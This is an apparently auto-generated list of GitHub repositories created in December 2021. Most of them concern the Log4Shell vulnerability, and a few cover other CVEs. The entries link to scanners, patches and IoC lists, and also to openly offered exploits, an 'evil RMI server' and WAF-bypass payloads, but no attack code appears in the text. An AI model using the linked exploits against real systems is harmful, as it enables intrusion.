**Find Log4Shell CVE-2021-44228 on your system** : [claranet/ansible-role-log4shell](https://github.com/claranet/ansible-role-log4shell) create time: 2021-12-13T16:41:31Z

**log4j version 1 with a patch for CVE-2021-44228 vulnerability** : [p3dr16k/log4j-1.2.15-mod](https://github.com/p3dr16k/log4j-1.2.15-mod) create time: 2021-12-13T16:40:14Z

**no description** : [tobiasoed/log4j-CVE-2021-44228](https://github.com/tobiasoed/log4j-CVE-2021-44228) create time: 2021-12-13T16:04:54Z

**Exploiting CVE-2021-42278 and CVE-2021-42287** : [waterrr/noPac](https://github.com/waterrr/noPac) create time: 2021-12-13T15:24:59Z

**demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability** : [kossatzd/log4j-CVE-2021-44228-test](https://github.com/kossatzd/log4j-CVE-2021-44228-test) create time: 2021-12-13T15:11:15Z

**Apply class remove process from ear/war/jar/zip archive, see https://logging.apache.org/log4j/2.x/** : [AlexandreHeroux/Fix-CVE-2021-44228](https://github.com/AlexandreHeroux/Fix-CVE-2021-44228) create time: 2021-12-13T15:04:31Z

**Check if Java allows JNDI remote code exec by default** : [trickyearlobe/CVE_2021_44228_Check](https://github.com/trickyearlobe/CVE_2021_44228_Check) create time: 2021-12-13T14:56:03Z

**Some tools to help mitigating Apache Log4j 2 CVE-2021-44228** : [madCdan/JndiLookup](https://github.com/madCdan/JndiLookup) create time: 2021-12-13T14:22:34Z

**Check if your server is vulnerable to the CVE-2021-44228. (node)** : [AdriDevelopsThings/check-log4j-vulnerability](https://github.com/AdriDevelopsThings/check-log4j-vulnerability) create time: 2021-12-13T14:10:43Z

**This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode** : [irgoncalves/f5-waf-quick-patch-cve-2021-44228](https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228) create time: 2021-12-13T13:41:39Z

**Mass Check Vulnerable Log4j CVE-2021-44228** : [justakazh/Log4j-CVE-2021-44228](https://github.com/justakazh/Log4j-CVE-2021-44228) create time: 2021-12-13T13:30:57Z

**no description** : [flxhaas/Scan-CVE-2021-44228](https://github.com/flxhaas/Scan-CVE-2021-44228) create time: 2021-12-13T13:28:26Z

**no description** : [LutziGoz/Log4Shell_Exploitation-Execution__CVE-2021-44228](https://github.com/LutziGoz/Log4Shell_Exploitation-Execution__CVE-2021-44228) create time: 2021-12-13T11:29:57Z

**Mass recognition tool for CVE-2021-44228** : [VNYui/CVE-2021-44228](https://github.com/VNYui/CVE-2021-44228) create time: 2021-12-13T13:25:19Z

**Log4j CVE-2021-44228 (Re lte+CE sample)** : [manuel-alvarez-alvarez/log4j-cve-2021-44228](https://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228) create time: 2021-12-13T13:08:03Z

**no description** : [zsolt-halo/CVE-2021-44228-Spring-Boot-Test-Service](https://github.com/zsolt-halo/CVE-2021-44228-Spring-Boot-Test-Service) create time: 2021-12-13T13:05:26Z

**CVE-2021-44228 - Apache log4j RCE quick test** : [jeffli1024/log4j-rce-test](https://github.com/jeffli1024/log4j-rce-test) create time: 2021-12-13T12:35:39Z

**CVE-2021-44228 on Podman** : [ahmad4fifz/CVE-2021-44228-podman](https://github.com/ahmad4fifz/CVE-2021-44228-podman) create time: 2021-12-13T12:30:11Z

**no description** : [0xsyr0/CVE-2021-44228-log4j-log4shell-Security-Research-Summary](https://github.com/0xsyr0/CVE-2021-44228-log4j-log4shell-Security-Research-Summary) create time: 2021-12-13T11:34:54Z

**A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i** : [full-disclosure/CVE-2021-44827](https://github.com/full-disclosure/CVE-2021-44827) create time: 2021-12-13T11:17:12Z

**Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.** : [0xDexter0us/Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner) create time: 2021-12-13T11:06:46Z

**simple python scanner to check if your network is vulnerable to CVE-2021-44228** : [sinakeshmiri/log4jScan](https://github.com/sinakeshmiri/log4jScan) create time: 2021-12-13T10:59:50Z

**Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user** : [Ridter/noPac](https://github.com/Ridter/noPac) create time: 2021-12-13T10:28:12Z

**no description** : [Amaranese/CVE-2021-34527](https://github.com/Amaranese/CVE-2021-34527) create time: 2021-12-13T10:04:49Z

**no description** : [lov3r/cve-2021-44228-log4j-exploits](https://github.com/lov3r/cve-2021-44228-log4j-exploits) create time: 2021-12-13T09:58:11Z

**Research into the implications of CVE-2021-44228 in Spring based applications.** : [Camphul/log4shell-spring-framework-research](https://github.com/Camphul/log4shell-spring-framework-research) create time: 2021-12-13T09:48:04Z

**Dirty Cow kernel exploit without libcrypt dependency** : [itlabbet/CVE-2021-40839](https://github.com/itlabbet/CVE-2021-40839) create time: 2021-12-13T09:47:22Z

**CVE-2021-36260** : [tuntin9x/CheckHKRCE](https://github.com/tuntin9x/CheckHKRCE) create time: 2021-12-13T09:23:36Z

**CVE-2021-44228** : [halibobor/log4j2](https://github.com/halibobor/log4j2) create time: 2021-12-13T07:03:50Z

**Simple tool for scanning entire directories for attempts of CVE-2021-44228** : [kek-Sec/log4j-scanner-CVE-2021-44228](https://github.com/kek-Sec/log4j-scanner-CVE-2021-44228) create time: 2021-12-13T08:51:56Z

**This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228** : [avwolferen/Sitecore.Solr-log4j-mitigation](https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation) create time: 2021-12-13T08:46:41Z

**Log4Shell Docker Env** : [ycdxsb/Log4Shell-CVE-2021-44228-ENV](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV) create time: 2021-12-13T08:43:45Z

**Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2)** : [JiuBanSec/Log4j-CVE-2021-44228](https://github.com/JiuBanSec/Log4j-CVE-2021-44228) create time: 2021-12-13T08:40:13Z

**A lab for playing around with the Log4J CVE-2021-44228** : [tuyenee/Log4shell](https://github.com/tuyenee/Log4shell) create time: 2021-12-13T08:13:07Z

**CVE-2021-44228 log4j mitigation using aws wafv2 with ansible** : [markuman/aws-log4j-mitigations](https://github.com/markuman/aws-log4j-mitigations) create time: 2021-12-13T08:01:55Z

**no description** : [helsecert/CVE-2021-44228](https://github.com/helsecert/CVE-2021-44228) create time: 2021-12-13T07:48:49Z

**Log4J CVE-2021-44228 : Mitigation Cheat Sheet** : [thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet](https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet) create time: 2021-12-13T07:24:02Z

**Scanner for Log4j RCE CVE-2021-44228** : [thecyberneh/Log4j-RCE-Exploiter](https://github.com/thecyberneh/Log4j-RCE-Exploiter) create time: 2021-12-13T06:53:01Z

**Grafana任意文件读取** : [Awrrays/Grafana-CVE-2021-43798](https://github.com/Awrrays/Grafana-CVE-2021-43798) create time: 2021-12-13T06:32:39Z

**OpenIOC rules to facilitate hunting for indicators of compromise** : [fireeye/CVE-2021-44228](https://github.com/fireeye/CVE-2021-44228) create time: 2021-12-13T03:55:32Z

**CVE-2021-44228 on Podman** : [ahmad4fifz-dev/CVE-2021-44228](https://github.com/ahmad4fifz-dev/CVE-2021-44228) create time: 2021-12-13T04:29:04Z

**a fast check, if your server could be vulnerable to CVE-2021-44228** : [rubo77/log4j_checker_beta](https://github.com/rubo77/log4j_checker_beta) create time: 2021-12-13T04:14:18Z

**A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228** : [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) create time: 2021-12-13T03:57:50Z

**Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes** : [0xRyan/log4j-nullroute](https://github.com/0xRyan/log4j-nullroute) create time: 2021-12-13T03:15:42Z

**This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).** : [pedrohavay/exploit-CVE-2021-44228](https://github.com/pedrohavay/exploit-CVE-2021-44228) create time: 2021-12-13T02:18:57Z

**log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload** : [bigsizeme/Log4j-check](https://github.com/bigsizeme/Log4j-check) create time: 2021-12-13T01:55:51Z

**CVE-2021-44228. Quick find and mitigate action for Windows OS.** : [lwsnz/log4j-win-quick](https://github.com/lwsnz/log4j-win-quick) create time: 2021-12-13T00:45:48Z

**Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.** : [KainsRache/anti-jndi](https://github.com/KainsRache/anti-jndi) create time: 2021-12-13T00:23:20Z

**Some files for red team/blue team investigations into CVE-2021-44228** : [kimobu/cve-2021-44228](https://github.com/kimobu/cve-2021-44228) create time: 2021-12-13T00:14:45Z

**fail2ban filter that catches attacks againts log4j CVE-2021-44228** : [atnetws/fail2ban-log4j](https://github.com/atnetws/fail2ban-log4j) create time: 2021-12-13T00:14:31Z

**no description** : [maxant/log4j2-CVE-2021-44228](https://github.com/maxant/log4j2-CVE-2021-44228) create time: 2021-12-13T00:02:54Z

**Test locally an exploit for Log4J2's CVE-2021-44228 (Log4Shell)** : [sunnyvale-it/CVE-2021-44228-PoC](https://github.com/sunnyvale-it/CVE-2021-44228-PoC) create time: 2021-12-12T23:37:39Z

**A micro lab for CVE-2021-44228 (log4j)** : [tasooshi/horrors-log4shell](https://github.com/tasooshi/horrors-log4shell) create time: 2021-12-12T15:44:49Z

**no description** : [DiCanio/CVE-2021-44228-docker-example](https://github.com/DiCanio/CVE-2021-44228-docker-example) create time: 2021-12-12T10:53:15Z

**no description** : [nils-trubkin/CVE-2018-6574](https://github.com/nils-trubkin/CVE-2018-6574) create time: 2021-12-12T23:01:07Z

**pythonic pure python RCE exploit for CVE-2021-44228 log4shell** : [dotPY-hax/log4py](https://github.com/dotPY-hax/log4py) create time: 2021-12-12T22:55:25Z

**Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)** : [Diverto/nse-log4shell](https://github.com/Diverto/nse-log4shell) create time: 2021-12-12T22:52:02Z

**no description** : [LongWayHomie/CVE-2021-43936](https://github.com/LongWayHomie/CVE-2021-43936) create time: 2021-12-12T22:31:00Z

**Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)** : [corneacristian/Log4J-CVE-2021-44228-RCE](https://github.com/corneacristian/Log4J-CVE-2021-44228-RCE) create time: 2021-12-12T21:52:53Z

**Log4Shell CVE-2021-44228** : [cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc) create time: 2021-12-12T21:45:33Z

**Mitigate against log4j vulnerability** : [palominoinc/cve-2021-44228-log4j-mitigation](https://github.com/palominoinc/cve-2021-44228-log4j-mitigation) create time: 2021-12-12T21:28:09Z

**Log4j RCE - (CVE-2021-44228)** : [momos1337/Log4j-RCE](https://github.com/momos1337/Log4j-RCE) create time: 2021-12-12T21:26:44Z

**no description** : [Panyaprach/Proof-CVE-2021-44228](https://github.com/Panyaprach/Proof-CVE-2021-44228) create time: 2021-12-12T20:31:19Z

**no description** : [sn0b4ll/cve-2021-44288_honeypot](https://github.com/sn0b4ll/cve-2021-44288_honeypot) create time: 2021-12-12T19:34:00Z

**Check list of URLs against Log4j vulnerability CVE-2021-44228** : [OlafHaalstra/log4jcheck](https://github.com/OlafHaalstra/log4jcheck) create time: 2021-12-12T18:57:05Z

**Spring Boot Log4j - CVE-2021-44228 Docker Lab** : [twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab](https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab) create time: 2021-12-12T16:54:33Z

**An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228** : [Hydragyrum/evil-rmi-server](https://github.com/Hydragyrum/evil-rmi-server) create time: 2021-12-12T16:49:45Z

**Apache Druid LoadData 任意文件读取漏洞 / Code By:Jun_sheng** : [Jun-5heng/CVE-2021-36749](https://github.com/Jun-5heng/CVE-2021-36749) create time: 2021-12-12T15:50:02Z

**no description** : [qingtengyun/cve-2021-44228-qingteng-online-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch) create time: 2021-12-12T15:30:55Z

**no description** : [qingtengyun/cve-2021-44228-qingteng-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-patch) create time: 2021-12-12T15:00:04Z

**no description** : [gixxyboy/CVE-2021-43798](https://github.com/gixxyboy/CVE-2021-43798) create time: 2021-12-12T15:16:55Z

**CVE-2021-44228 test demo** : [fireflyingup/log4j-poc](https://github.com/fireflyingup/log4j-poc) create time: 2021-12-12T14:54:25Z

**Apache Druid remote code execution vulnerability - Apache Druid 远程代码执行漏洞利用** : [j2ekim/cve-2021-25646](https://github.com/j2ekim/cve-2021-25646) create time: 2021-12-12T14:40:12Z

**Known IoCs for log4j framework vulnerability** : [guardicode/CVE-2021-44228_IoCs](https://github.com/guardicode/CVE-2021-44228_IoCs) create time: 2021-12-12T14:27:28Z

**Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability** : [authomize/log4j-log4shell-affected](https://github.com/authomize/log4j-log4shell-affected) create time: 2021-12-12T14:05:05Z

**no description** : [lohanichaten/log4j-cve-2021-44228](https://github.com/lohanichaten/log4j-cve-2021-44228) create time: 2021-12-12T13:59:38Z

**Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script** : [infiniroot/nginx-mitigate-log4shell](https://github.com/infiniroot/nginx-mitigate-log4shell) create time: 2021-12-12T13:45:08Z

**Python script that sends CVE-2021-44228 log4j payload requests to url list** : [ssl/scan4log4j](https://github.com/ssl/scan4log4j) create time: 2021-12-12T13:28:31Z

**Dockerized Go app for testing the CVE-2021-44228 vulnerability** : [urholaukkarinen/docker-log4shell](https://github.com/urholaukkarinen/docker-log4shell) create time: 2021-12-12T13:19:50Z

**IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228** : [Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228](https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228) create time: 2021-12-12T13:17:18Z

**no description** : [pravin-pp/log4j2-CVE-2021-44228](https://github.com/pravin-pp/log4j2-CVE-2021-44228) create time: 2021-12-12T13:00:38Z

**Sample log4j shell exploit** : [kali-dass/CVE-2021-44228-log4Shell](https://github.com/kali-dass/CVE-2021-44228-log4Shell) create time: 2021-12-12T12:27:39Z

**Poc of log4j2 (CVE-2021-44228)** : [Crane-Mocker/log4j-poc](https://github.com/Crane-Mocker/log4j-poc) create time: 2021-12-12T11:31:45Z

**Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :)** : [0-x-2-2/CVE-2021-44228](https://github.com/0-x-2-2/CVE-2021-44228) create time: 2021-12-12T11:26:42Z

**An awesome curated list of repos for CVE-2021-44228. ``Apache Log4j 2``** : [RrUZi/Awesome-CVE-2021-44228](https://github.com/RrUZi/Awesome-CVE-2021-44228) create time: 2021-12-12T11:25:00Z

**CVE-2021-44228 Minecraft PoC** : [myyxl/cve-2021-44228-minecraft-poc](https://github.com/myyxl/cve-2021-44228-minecraft-poc) create time: 2021-12-12T11:22:51Z

**no description** : [mute1997/CVE-2021-44228-research](https://github.com/mute1997/CVE-2021-44228-research) create time: 2021-12-12T11:08:54Z

**On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of devops frameworks, enterprise IT systems, and vendor software and cloud products.** : [sud0x00/log4j---CVE-2021-44228](https://github.com/sud0x00/log4j---CVE-2021-44228) create time: 2021-12-12T10:22:45Z

**CVE-2021-44228(Apache Log4j Remote Code Execution)** : [RK800-DEV/apache-log4j-poc](https://github.com/RK800-DEV/apache-log4j-poc) create time: 2021-12-12T10:17:13Z

**no description** : [uint0/cve-2021-44228-helpers](https://github.com/uint0/cve-2021-44228-helpers) create time: 2021-12-12T09:21:09Z

**A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell).** : [unlimitedsola/log4j2-rce-poc](https://github.com/unlimitedsola/log4j2-rce-poc) create time: 2021-12-12T01:23:45Z

**My take on Log4j2 vulnerability** : [bchaber/CVE-2021-44228](https://github.com/bchaber/CVE-2021-44228) create time: 2021-12-12T07:39:51Z

**log4j2漏洞复现** : [creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review](https://github.com/creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review) create time: 2021-12-12T07:20:03Z

**An agent to hotpatch the log4j RCE from CVE-2021-44228.** : [corretto/hotpatch-for-apache-log4j2](https://github.com/corretto/hotpatch-for-apache-log4j2) create time: 2021-12-12T01:24:51Z

**Script to patch VMware vCenter log4j vulnerability CVE-2021-44228** : [blake-fm/vcenter-log4j](https://github.com/blake-fm/vcenter-log4j) create time: 2021-12-12T04:23:10Z

**Use environment variable to disable lookup.** : [Ghost-chu/CVE-2021-44228-quickfix-script](https://github.com/Ghost-chu/CVE-2021-44228-quickfix-script) create time: 2021-12-12T04:17:08Z

**Apache Log4j CVE-2021-44228 漏洞复现** : [zhangxvx/Log4j-Rec-CVE-2021-44228](https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228) create time: 2021-12-11T16:08:34Z

**Apache Log4j2 CVE-2021-44228 RCE** : [mzlogin/CVE-2021-44228-Demo](https://github.com/mzlogin/CVE-2021-44228-Demo) create time: 2021-12-12T03:11:14Z

**no description** : [RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs](https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs) create time: 2021-12-12T02:59:54Z

**Pure Vanilla Python PoC for CVE-2021-44228** : [alexandre-lavoie/python-log4shell](https://github.com/alexandre-lavoie/python-log4shell) create time: 2021-12-12T02:57:49Z

**docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228** : [jeffbryner/log4j-docker-vaccine](https://github.com/jeffbryner/log4j-docker-vaccine) create time: 2021-12-11T23:06:23Z

**This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device** : [irgoncalves/f5-waf-enforce-sig-CVE-2021-44228](https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228) create time: 2021-12-11T21:59:19Z

**no description** : [chilliwebs/CVE-2021-44228_Example](https://github.com/chilliwebs/CVE-2021-44228_Example) create time: 2021-12-11T20:25:08Z

**CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.** : [cube0x0/noPac](https://github.com/cube0x0/noPac) create time: 2021-12-11T19:27:30Z

**This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).** : [pedrohavay/exploit-grafana-CVE-2021-43798](https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798) create time: 2021-12-11T18:49:30Z

**Detections for CVE-2021-44228 inside of nested binaries** : [darkarnium/CVE-2021-44228](https://github.com/darkarnium/CVE-2021-44228) create time: 2021-12-11T16:08:47Z

**Test CVE-2018-15473 exploit on Shodan IP** : [66quentin/shodan-CVE-2018-15473](https://github.com/66quentin/shodan-CVE-2018-15473) create time: 2021-12-11T15:50:57Z

**no description** : [LongWayHomie/CVE-2021-43798](https://github.com/LongWayHomie/CVE-2021-43798) create time: 2021-12-11T16:24:58Z

**Simple demo of CVE-2021-44228** : [datadavev/test-44228](https://github.com/datadavev/test-44228) create time: 2021-12-11T15:33:17Z

**Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user** : [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin) create time: 2021-12-11T15:10:30Z

**CVE 2018-20148 and 2019-9168** : [tthseus/WooCommerce-CVEs](https://github.com/tthseus/WooCommerce-CVEs) create time: 2019-10-25T03:03:52Z

**CVE-2021-44228** : [zzzz0317/Log4j2-Vulnerable-App](https://github.com/zzzz0317/Log4j2-Vulnerable-App) create time: 2021-12-11T15:18:42Z

**Public IoCs about log4j CVE-2021-44228** : [Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs](https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs) create time: 2021-12-11T14:54:45Z

**proof of concept for CVE-2021-44228** : [trevalkov/javalogslulz](https://github.com/trevalkov/javalogslulz) create time: 2021-12-11T14:34:43Z

**A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)** : [CreeperHost/Log4jPatcher](https://github.com/CreeperHost/Log4jPatcher) create time: 2021-12-10T09:16:46Z

**A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228** : [Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform](https://github.com/Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform) create time: 2021-12-11T13:56:28Z

**Log4j-RCE (CVE-2021-44228) Proof of Concept** : [PwnC00re/Log4J_0day_RCE](https://github.com/PwnC00re/Log4J_0day_RCE) create time: 2021-12-11T13:28:52Z

**Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228** : [cado-security/log4shell](https://github.com/cado-security/log4shell) create time: 2021-12-11T13:03:31Z

**List of company advisories log4j** : [leetxyz/CVE-2021-44228-Advisories](https://github.com/leetxyz/CVE-2021-44228-Advisories) create time: 2021-12-11T12:41:38Z

**Scan your logs for CVE-2021-44228 related activity and report the attackers** : [js-on/jndiRep](https://github.com/js-on/jndiRep) create time: 2021-12-11T12:25:08Z

**no description** : [b-abderrahmane/CVE-2021-44228-playground](https://github.com/b-abderrahmane/CVE-2021-44228-playground) create time: 2021-12-11T12:16:45Z

**Test the CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228** : [gauthamg/log4j2021_vul_test](https://github.com/gauthamg/log4j2021_vul_test) create time: 2021-12-11T11:41:04Z

**no description** : [vorburger/Log4j_CVE-2021-44228](https://github.com/vorburger/Log4j_CVE-2021-44228) create time: 2021-12-11T11:38:16Z

**Vulnerability scanner for Log4j2 CVE-2021-44228** : [logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner) create time: 2021-12-11T11:18:46Z

**A simple and harmless example implementation of CVE-2017-5645.** : [sefayfr/log4j-RCE](https://github.com/sefayfr/log4j-RCE) create time: 2021-12-11T10:35:02Z

**A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads** : [toramanemre/log4j-rce-detect-waf-bypass](https://github.com/toramanemre/log4j-rce-detect-waf-bypass) create time: 2021-12-11T10:19:01Z

**Log4Shell CVE-2021-44228 mitigation tester** : [lhotari/log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester) create time: 2021-12-11T10:16:58Z

**no description** : [byteboycn/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/byteboycn/CVE-2021-44228-Apache-Log4j-Rce) create time: 2021-12-11T09:52:36Z

**RDP Client RCE** : [JaneMandy/CVE-2021-38666](https://github.com/JaneMandy/CVE-2021-38666) create time: 2021-12-11T09:42:28Z

**no description** : [M1ngGod/CVE-2021-44228-Log4j-lookup-Rce](https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce) create time: 2021-12-11T07:55:45Z

**no description** : [waseeld/CVE-2021-42574](https://github.com/waseeld/CVE-2021-42574) create time: 2021-12-11T07:23:17Z

**CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名** : [f0ng/log4j2burpscanner](https://github.com/f0ng/log4j2burpscanner) create time: 2021-12-11T07:19:11Z

**Fixes CVE-2021-44228 in log4j by patching JndiLookup class** : [saharNooby/log4j-vulnerability-patcher-agent](https://github.com/saharNooby/log4j-vulnerability-patcher-agent) create time: 2021-12-11T07:16:21Z

**no description** : [SamHackingArticles/CVE-2007-2447](https://github.com/SamHackingArticles/CVE-2007-2447) create time: 2021-12-11T04:50:54Z

**Test for log4j vulnerability across your external footprint** : [ssstonebraker/log4j_CVE-2021-44228_tester](https://github.com/ssstonebraker/log4j_CVE-2021-44228_tester) create time: 2021-12-11T04:34:51Z

**A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.** : [rakutentech/jndi-ldap-test-server](https://github.com/rakutentech/jndi-ldap-test-server) create time: 2021-12-11T03:08:14Z

**A short demo of CVE-2021-44228** : [phoswald/sample-ldap-exploit](https://github.com/phoswald/sample-ldap-exploit) create time: 2021-12-11T02:45:39Z

**Apache Log4j2 RCE( CVE-2021-44228)验证环境** : [1in9e/Apache-Log4j2-RCE](https://github.com/1in9e/Apache-Log4j2-RCE) create time: 2021-12-10T15:57:14Z

**Vulnerable to CVE-2021-44228. trustURLCodebase is not required.** : [nkoneko/VictimApp](https://github.com/nkoneko/VictimApp) create time: 2021-12-10T15:32:03Z

**Apache Log4j 远程代码执行** : [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce) create time: 2021-12-09T15:27:38Z

**Log4j2 CVE-2021-44228 复现和分析** : [binganao/Log4j2-RCE](https://github.com/binganao/Log4j2-RCE) create time: 2021-12-11T02:08:41Z

**Scans files for .jars potentially vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the .jar.** : [1lann/log4shelldetect](https://github.com/1lann/log4shelldetect) create time: 2021-12-11T01:08:00Z

**no description** : [racoon-rac/CVE-2021-44228](https://github.com/racoon-rac/CVE-2021-44228) create time: 2021-12-10T23:37:55Z

**Java Agent that disables Apache Log4J's JNDI Lookup. Quick-fix for CVE-2021-44228** : [alerithe/log4j-patcher](https://github.com/alerithe/log4j-patcher) create time: 2021-12-10T21:59:31Z

**Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam** : [Adikso/minecraft-log4j-honeypot](https://github.com/Adikso/minecraft-log4j-honeypot) create time: 2021-12-10T23:35:31Z

**Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit)** : [alexandreroman/cve-2021-44228-workaround-buildpack](https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack) create time: 2021-12-10T23:34:52Z

**A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.** : [kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc) create time: 2021-12-10T23:19:28Z

**🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches** : [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words) create time: 2021-12-10T22:35:00Z

**Simple Python 3 script to detect the Java library "Log4j" vulnerability (CVE-2021-44228) for a list of URLs** : [takito1812/log4j-detect](https://github.com/takito1812/log4j-detect) create time: 2021-12-10T21:46:18Z

**no description** : [greymd/CVE-2021-44228](https://github.com/greymd/CVE-2021-44228) create time: 2021-12-10T17:24:47Z

**no description** : [LongWayHomie/CVE-2017-12617](https://github.com/LongWayHomie/CVE-2017-12617) create time: 2021-12-10T22:21:07Z

**CVE-2021-44228 DFIR Notes** : [Azeemering/CVE-2021-44228-DFIR-Notes](https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes) create time: 2021-12-10T22:19:16Z

**list of ips pulled from greynoise for this** : [seamus-dev/CVE-2021-44228](https://github.com/seamus-dev/CVE-2021-44228) create time: 2021-12-10T21:41:12Z

**log4shell sample application (CVE-2021-44228)** : [StandB/CVE-2021-44228-poc](https://github.com/StandB/CVE-2021-44228-poc) create time: 2021-12-10T21:13:46Z

**Mitigation for Log4Shell Security Vulnerability CVE-2021-44228** : [izzyacademy/log4shell-mitigation](https://github.com/izzyacademy/log4shell-mitigation) create time: 2021-12-10T20:39:56Z

**no description** : [wheez-y/CVE-2021-44228-kusto](https://github.com/wheez-y/CVE-2021-44228-kusto) create time: 2021-12-10T19:53:32Z

**CVE-2021-44228 server-side fix for minecraft servers.** : [OopsieWoopsie/mc-log4j-patcher](https://github.com/OopsieWoopsie/mc-log4j-patcher) create time: 2021-12-10T19:25:31Z

**Hashes for vulnerable LOG4J versions** : [mubix/CVE-2021-44228-Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes) create time: 2021-12-10T18:06:06Z

**RCE POC** : [KosmX/CVE-2021-44228-example](https://github.com/KosmX/CVE-2021-44228-example) create time: 2021-12-10T17:13:18Z

**no description** : [R00tendo/CVE-2012-2982](https://github.com/R00tendo/CVE-2012-2982) create time: 2021-12-10T15:29:07Z

**Patch Pulsar Docker images with Log4J 2.15.0 update to mitigate CVE-2021-44228** : [lhotari/pulsar-docker-images-patch-CVE-2021-44228](https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228) create time: 2021-12-10T15:46:49Z

**tcpshield wasiresolver!?** : [racisz/CVE-2021-44228-test](https://github.com/racisz/CVE-2021-44228-test) create time: 2021-12-10T15:39:09Z

**no description** : [sohtsuka/CVE-2021-44228-PoC](https://github.com/sohtsuka/CVE-2021-44228-PoC) create time: 2021-12-10T14:57:55Z

**Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.** : [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) create time: 2021-12-10T12:38:20Z

**A small server for verifing if a given java program is succeptibel to CVE-2021-44228** : [zlepper/CVE-2021-44228-Test-Server](https://github.com/zlepper/CVE-2021-44228-Test-Server) create time: 2021-12-10T12:35:30Z

